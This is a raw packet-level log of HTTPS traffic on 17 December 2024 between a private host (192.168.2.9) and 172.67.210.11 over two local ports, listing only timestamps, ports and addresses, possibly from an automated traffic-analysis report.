                                                  Dec 17, 2024 08:29:32.165159941 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.173293114 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.173350096 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.173360109 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.225750923 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.274837971 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.319516897 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.319545031 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.366394997 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.390724897 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.394673109 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.394747019 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.394768000 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.409833908 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.409884930 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.409960032 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.409976959 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.410036087 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.417550087 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.425690889 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.425765038 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.425776005 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.475748062 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.513834953 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.513845921 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.513962030 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.521929026 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.521935940 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.522011995 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:32.983813047 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.983824015 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:32.983958960 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.099044085 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.099055052 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.099242926 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.332499981 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.332515955 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.332779884 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.348933935 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.348943949 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.349080086 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.356954098 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.357069016 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.443648100 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.443770885 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.454123974 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.454132080 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.454183102 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.506998062 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.507029057 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.553879023 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.565160990 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.565171957 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.565279961 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.573260069 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.573268890 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.573347092 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.686575890 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.686585903 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.686706066 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.803797960 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.803808928 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.803956032 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.874439001 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.874448061 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.874535084 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.874560118 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.874603033 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.919147015 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.919157982 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.919255972 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.991308928 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.991326094 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.991409063 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:33.991430044 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:33.991471052 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.035012960 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.035187960 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.066472054 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.066607952 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.066632986 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.116383076 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.145972967 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.145981073 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.146260977 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.183248997 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.183259010 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.183322906 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.183346987 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.225732088 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.255508900 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.255518913 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.255597115 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.274483919 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.274492025 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.274594069 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.274612904 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.319644928 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.368587971 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.368597984 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.368662119 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.376605988 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.376616955 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.376693964 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.392591000 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.392601967 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.392731905 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.475871086 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.475879908 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.475977898 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.489051104 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.489061117 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.489106894 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.489284992 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.489301920 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.489371061 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.583477974 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.583673954 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.595263958 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.595405102 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.602077961 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.602166891 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.694601059 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.694700956 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.707712889 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.707777977 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.714562893 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.714629889 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.721060038 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.721112967 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.832540989 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.832551003 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.832576036 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.832603931 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.832633018 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.832644939 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.882910013 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.949928999 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.949939966 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.949969053 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.949980974 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.950021982 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.950043917 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:34.950058937 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:34.991348028 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.067583084 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.067600012 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.067616940 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.067648888 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.067677021 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.067687988 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.116374969 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.188152075 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188168049 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188205004 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188251019 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188266039 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.188296080 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.188309908 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.241360903 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.633153915 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.633172035 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.633241892 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.751709938 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.751727104 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.751847982 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:35.875062943 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.875077963 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:35.875210047 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.177263021 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.177414894 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.297544956 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297560930 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297570944 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297581911 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297615051 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297825098 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.297854900 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297867060 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297878027 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.297883987 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297919989 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.297924042 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.298466921 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.346893072 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.346908092 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.346936941 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.347026110 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.347057104 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.347142935 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.917941093 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918035984 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.918086052 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918107986 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918148041 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.918469906 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918551922 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.918565035 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918584108 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918623924 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.918632030 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918673038 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918678999 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.918761969 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.918768883 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.918828011 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.919011116 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.919131041 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.920155048 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.920233011 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.920247078 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.920310020 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.920958996 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.921025991 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.921030998 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.921053886 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.921092033 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.921816111 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.921889067 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.921896935 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.921941996 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.927385092 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.927467108 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.932513952 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.932600975 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.937659979 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.937742949 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.942595959 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.942652941 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.942735910 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.942794085 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:36.947860956 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:36.947917938 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.034730911 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.034898996 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.038971901 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.039042950 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.044039965 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.044116974 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.049151897 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.049238920 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.064492941 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.064568996 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.074671984 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.074747086 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.079777002 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.079838037 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.084964991 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.085035086 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.178144932 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.178200006 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.178234100 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.178255081 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.178277016 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.225733042 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.273195982 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.273281097 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.286120892 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.286169052 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.286197901 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.286233902 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.286242962 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.286284924 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.290081024 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.290148973 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.404344082 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.404393911 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.404469013 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.404484987 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.404500961 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.460125923 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.518326998 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.518363953 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.518400908 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.518419027 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.518440008 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.518440008 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.518490076 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.518502951 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.518513918 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.569557905 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.622874022 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.622888088 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.623003960 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.639704943 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.639718056 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.639735937 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.639744043 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.639763117 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.639784098 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.639806986 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.639827967 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.744452953 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.744469881 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.744581938 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.759403944 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.759418011 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.759453058 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.759515047 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.759517908 CET44349717172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:29:37.759597063 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:29:37.762518883 CET49717443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:15.921952963 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:15.922003031 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:15.922072887 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:15.930514097 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:15.930532932 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.151752949 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.151844025 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.207525015 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.207570076 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.207947016 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.208007097 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.211282969 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.251358986 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.833324909 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.833373070 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.833403111 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.833430052 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.833456993 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.833481073 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.833503962 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.833503962 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.833503962 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.833533049 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.833551884 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.833551884 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.833616972 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.841427088 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.841481924 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.841494083 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.841530085 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.849689007 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.849729061 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.849754095 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.850003958 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.858082056 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.858910084 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:17.953080893 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:17.953151941 CET49815443192.168.2.9172.67.210.11
